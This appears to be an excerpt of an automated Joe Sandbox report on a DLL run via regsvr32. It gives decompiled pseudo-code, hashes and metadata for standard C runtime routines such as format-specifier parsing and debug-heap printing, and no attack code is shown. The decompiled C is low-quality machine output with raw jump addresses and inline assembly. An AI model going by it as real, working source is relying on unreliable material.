                                                                                • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 530996419-4087627031
                                                                                • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                • Instruction ID: 819965b6c29b623576735f5af2eb6270283dc6395ef7b18d13e33910ba69aead
                                                                                • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                • Instruction Fuzzy Hash: F2514C6290C6C69AE3B19B14E8543BEB7F4EB86344F0C4135D6AD8699EDBACE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DD30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E00007FFA7FFA5247DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t139;
				char* _t159;
				char* _t160;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
				_t159 =  &_a1560;
				_a88 = E00007FFA7FFA52471E40(_t159);
				if (_a88 >= 0) goto 0x5247dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247dd83;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
				_t160 =  &_a1560;
				_a116 = E00007FFA7FFA52471E40(_t160);
				if (_a116 >= 0) goto 0x5247ddc2;
				_a116 = 0xffffffff;
				goto 0x5247dddb;
				_a116 = _t139 + _t160 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}






                                                                                0x7ffa5247dd3b
                                                                                0x7ffa5247dd3d
                                                                                0x7ffa5247dd4a
                                                                                0x7ffa5247dd53
                                                                                0x7ffa5247dd5c
                                                                                0x7ffa5247dd66
                                                                                0x7ffa5247dd6a
                                                                                0x7ffa5247dd7f
                                                                                0x7ffa5247dd88
                                                                                0x7ffa5247dda0
                                                                                0x7ffa5247dda2
                                                                                0x7ffa5247ddaf
                                                                                0x7ffa5247ddb8
                                                                                0x7ffa5247ddba
                                                                                0x7ffa5247ddc2
                                                                                0x7ffa5247ddd7
                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-734865713
                                                                                • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                • Instruction ID: 5dd2c0767ca1b38129e643210283da30da86b705739990ed4327bf3dcb913912
                                                                                • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                • Instruction Fuzzy Hash: DA51FAB291C6C6CAE7708B14E8403BAB7E0FB86345F488135E69D87999DBACE441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BD82 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E00007FFA7FFA5247BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t139;
				char* _t159;
				char* _t160;

				if (_a696 != 0x2a) goto 0x5247bdbe;
				_t159 =  &_a1112;
				_a88 = E00007FFA7FFA52471E40(_t159);
				if (_a88 >= 0) goto 0x5247bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247bdd5;
				_a88 = _t139 + _t159 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0x5247be16;
				_t160 =  &_a1112;
				_a116 = E00007FFA7FFA52471E40(_t160);
				if (_a116 >= 0) goto 0x5247be14;
				_a116 = 0xffffffff;
				goto 0x5247be2d;
				_a116 = _t139 + _t160 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0x5247beb7;
				if (_a972 == 0x68) goto 0x5247bfc0;
				if (_a972 == 0x6c) goto 0x5247be76;
				if (_a972 == 0x77) goto 0x5247bfcd;
				goto 0x5247bfd9;
				if ( *_a1096 != 0x6c) goto 0x5247bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0x5247beb2;
				_a80 = _a80 | 0x00000010;
				goto 0x5247bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0x5247bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 != 0x33) goto 0x5247bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 == 0x64) goto 0x5247bfac;
				if ( *_a1096 == 0x69) goto 0x5247bfac;
				if ( *_a1096 == 0x6f) goto 0x5247bfac;
				if ( *_a1096 == 0x75) goto 0x5247bfac;
				if ( *_a1096 == 0x78) goto 0x5247bfac;
				if ( *_a1096 != 0x58) goto 0x5247bfae;
				goto 0x5247bfbe;
				_a704 = 0;
				goto E00007FFA7FFA5247BB66;
				goto 0x5247bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0x5247bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}






                                                                                0x7ffa5247bd8d
                                                                                0x7ffa5247bd8f
                                                                                0x7ffa5247bd9c
                                                                                0x7ffa5247bda5
                                                                                0x7ffa5247bdae
                                                                                0x7ffa5247bdb8
                                                                                0x7ffa5247bdbc
                                                                                0x7ffa5247bdd1
                                                                                0x7ffa5247bdda
                                                                                0x7ffa5247bdf2
                                                                                0x7ffa5247bdf4
                                                                                0x7ffa5247be01
                                                                                0x7ffa5247be0a
                                                                                0x7ffa5247be0c
                                                                                0x7ffa5247be14
                                                                                0x7ffa5247be29
                                                                                0x7ffa5247be3a
                                                                                0x7ffa5247be49
                                                                                0x7ffa5247be53
                                                                                0x7ffa5247be61
                                                                                0x7ffa5247be6b
                                                                                0x7ffa5247be71
                                                                                0x7ffa5247be84
                                                                                0x7ffa5247be91
                                                                                0x7ffa5247be9d
                                                                                0x7ffa5247bea5
                                                                                0x7ffa5247beae
                                                                                0x7ffa5247beb2
                                                                                0x7ffa5247bebb
                                                                                0x7ffa5247bed1
                                                                                0x7ffa5247bee2
                                                                                0x7ffa5247bef0
                                                                                0x7ffa5247befc
                                                                                0x7ffa5247bf04
                                                                                0x7ffa5247bf17
                                                                                0x7ffa5247bf28
                                                                                0x7ffa5247bf36
                                                                                0x7ffa5247bf42
                                                                                0x7ffa5247bf4a
                                                                                0x7ffa5247bf5a
                                                                                0x7ffa5247bf6a
                                                                                0x7ffa5247bf7a
                                                                                0x7ffa5247bf8a
                                                                                0x7ffa5247bf9a
                                                                                0x7ffa5247bfaa
                                                                                0x7ffa5247bfac
                                                                                0x7ffa5247bfae
                                                                                0x7ffa5247bfb9
                                                                                0x7ffa5247bfbe
                                                                                0x7ffa5247bfc7
                                                                                0x7ffa5247bfcb
                                                                                0x7ffa5247bfd1
                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-192189897
                                                                                • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                • Instruction ID: c8fe72fa0d4ac2bd902c75eb0594ee4d04f01b629bd9cf40f0fc20d5498a9b5e
                                                                                • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                • Instruction Fuzzy Hash: 4E511B6290C6C68AE770DB20E8943BEB7F4E786344F484135D6AD8699EDBACE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DD95 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t113;
				char* _t133;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
				_t133 =  &_a1560;
				_a116 = E00007FFA7FFA52471E40(_t133);
				if (_a116 >= 0) goto 0x5247ddc2;
				_a116 = 0xffffffff;
				goto 0x5247dddb;
				_a116 = _t113 + _t133 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}





                                                                                0x7ffa5247dda0
                                                                                0x7ffa5247dda2
                                                                                0x7ffa5247ddaf
                                                                                0x7ffa5247ddb8
                                                                                0x7ffa5247ddba
                                                                                0x7ffa5247ddc2
                                                                                0x7ffa5247ddd7
                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-734865713
                                                                                • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                • Instruction ID: c3d4481eda0d78e9bf4ca24cecce4ba62a8f039801a69b54a4e3a7884d9e3760
                                                                                • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                • Instruction Fuzzy Hash: 30411D6291C686CAE7708B24E8403BA76F0FB86745F488135D6AD86599DFBCD441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BDE7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t113;
				char* _t133;

				if (_a696 != 0x2a) goto 0x5247be16;
				_t133 =  &_a1112;
				_a116 = E00007FFA7FFA52471E40(_t133);
				if (_a116 >= 0) goto 0x5247be14;
				_a116 = 0xffffffff;
				goto 0x5247be2d;
				_a116 = _t113 + _t133 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0x5247beb7;
				if (_a972 == 0x68) goto 0x5247bfc0;
				if (_a972 == 0x6c) goto 0x5247be76;
				if (_a972 == 0x77) goto 0x5247bfcd;
				goto 0x5247bfd9;
				if ( *_a1096 != 0x6c) goto 0x5247bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0x5247beb2;
				_a80 = _a80 | 0x00000010;
				goto 0x5247bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0x5247bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 != 0x33) goto 0x5247bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 == 0x64) goto 0x5247bfac;
				if ( *_a1096 == 0x69) goto 0x5247bfac;
				if ( *_a1096 == 0x6f) goto 0x5247bfac;
				if ( *_a1096 == 0x75) goto 0x5247bfac;
				if ( *_a1096 == 0x78) goto 0x5247bfac;
				if ( *_a1096 != 0x58) goto 0x5247bfae;
				goto 0x5247bfbe;
				_a704 = 0;
				goto E00007FFA7FFA5247BB66;
				goto 0x5247bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0x5247bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}





                                                                                0x7ffa5247bdf2
                                                                                0x7ffa5247bdf4
                                                                                0x7ffa5247be01
                                                                                0x7ffa5247be0a
                                                                                0x7ffa5247be0c
                                                                                0x7ffa5247be14
                                                                                0x7ffa5247be29
                                                                                0x7ffa5247be3a
                                                                                0x7ffa5247be49
                                                                                0x7ffa5247be53
                                                                                0x7ffa5247be61
                                                                                0x7ffa5247be6b
                                                                                0x7ffa5247be71
                                                                                0x7ffa5247be84
                                                                                0x7ffa5247be91
                                                                                0x7ffa5247be9d
                                                                                0x7ffa5247bea5
                                                                                0x7ffa5247beae
                                                                                0x7ffa5247beb2
                                                                                0x7ffa5247bebb
                                                                                0x7ffa5247bed1
                                                                                0x7ffa5247bee2
                                                                                0x7ffa5247bef0
                                                                                0x7ffa5247befc
                                                                                0x7ffa5247bf04
                                                                                0x7ffa5247bf17
                                                                                0x7ffa5247bf28
                                                                                0x7ffa5247bf36
                                                                                0x7ffa5247bf42
                                                                                0x7ffa5247bf4a
                                                                                0x7ffa5247bf5a
                                                                                0x7ffa5247bf6a
                                                                                0x7ffa5247bf7a
                                                                                0x7ffa5247bf8a
                                                                                0x7ffa5247bf9a
                                                                                0x7ffa5247bfaa
                                                                                0x7ffa5247bfac
                                                                                0x7ffa5247bfae
                                                                                0x7ffa5247bfb9
                                                                                0x7ffa5247bfbe
                                                                                0x7ffa5247bfc7
                                                                                0x7ffa5247bfcb
                                                                                0x7ffa5247bfd1
                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2576288505-192189897
                                                                                • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                • Instruction ID: a05fe08ed8a31b0af60af610ef72503ba2111a3081301dfb2c680f9e25707f87
                                                                                • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                • Instruction Fuzzy Hash: 4D415F6290C6C68AE3709B24E8543BEB7F4E786704F484135D6AD86A9EDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52466C32 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_oneof_swprintf_p
                                                                                • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 2731067127-3604075083
                                                                                • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                • Instruction ID: cb85e8c0f6a241fe7ffb1120b9e5c262712918a8f5b993ca300c5df1b697a948
                                                                                • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                • Instruction Fuzzy Hash: 6741187260D6C186E7249B51E8507AABBB1FB96740F548136EA8D47B8DDFBCE404CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52474F20 Relevance: 9.1, APIs: 6, Instructions: 123COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 41%
                                                                                			E00007FFA7FFA52474F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
				void* _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				void* _v56;
				signed int _v72;
				long long _v80;
				signed int _v88;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t101;
				long long _t113;
				intOrPtr _t116;
				void* _t117;
				long long _t118;
				long long _t121;
				long long _t122;
				long long _t125;
				void* _t164;

				_t113 = __rax;
				_a32 = r9d;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v88 = E00007FFA7FFA52473B70(_a8, _a16, _a24);
				E00007FFA7FFA5246E680(_t79, _t113);
				_v80 = _t113;
				0x52464000();
				_v56 = _t113 + 0x100;
				 *_v56 =  *_v56 + 1;
				if (_v88 == 0xffffffff) goto 0x52475103;
				if (_v88 - _a32 <= 0) goto 0x52475103;
				if (_v88 - 0xffffffff <= 0) goto 0x52474fb9;
				_t116 = _a24;
				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0x52474fb9;
				goto 0x52474fbe;
				E00007FFA7FFA5246E680(E00007FFA7FFA5246CF80(_t116), _t116);
				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
				_t88 = E00007FFA7FFA5246E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0x52475038;
				_t89 = E00007FFA7FFA5246E680(_t88, _t118);
				_v48 = _t118;
				_t90 = E00007FFA7FFA5246E680(_t89, _t118);
				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v40 = _t121;
				goto 0x52475041;
				_v40 = 0;
				if (_v40 == 0) goto 0x524750f4;
				r9d = _v72;
				_t92 = E00007FFA7FFA5246E680(E00007FFA7FFA52473BD0(_t90, _a8, _a16, _a24), _t121);
				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0x524750c9;
				_t93 = E00007FFA7FFA5246E680(_t92, _t122);
				_v32 = _t122;
				E00007FFA7FFA5246E680(_t93, _t122);
				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v24 = _t125;
				goto 0x524750d2;
				_v24 = 0;
				r8d = 0x103;
				E00007FFA7FFA5246E6C0(E00007FFA7FFA5247D7E0(_v24, _a8, _t164), _t125, _v80);
				goto 0x524750f6;
				_v88 = _v72;
				goto 0x52474f83;
				0x52464000();
				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0x52475131;
				0x52464000();
				_v16 = _t125 + 0x100;
				 *_v16 =  *_v16 - 1;
				if (_v88 == 0xffffffff) goto 0x5247514a;
				if (_v88 - _a32 <= 0) goto 0x5247514a;
				_t101 = E00007FFA7FFA5246CF80(_v16);
				r9d = _v88;
				return E00007FFA7FFA52473BD0(_t101, _a8, _a16, _a24);
			}


























                                                                                0x7ffa52474f20
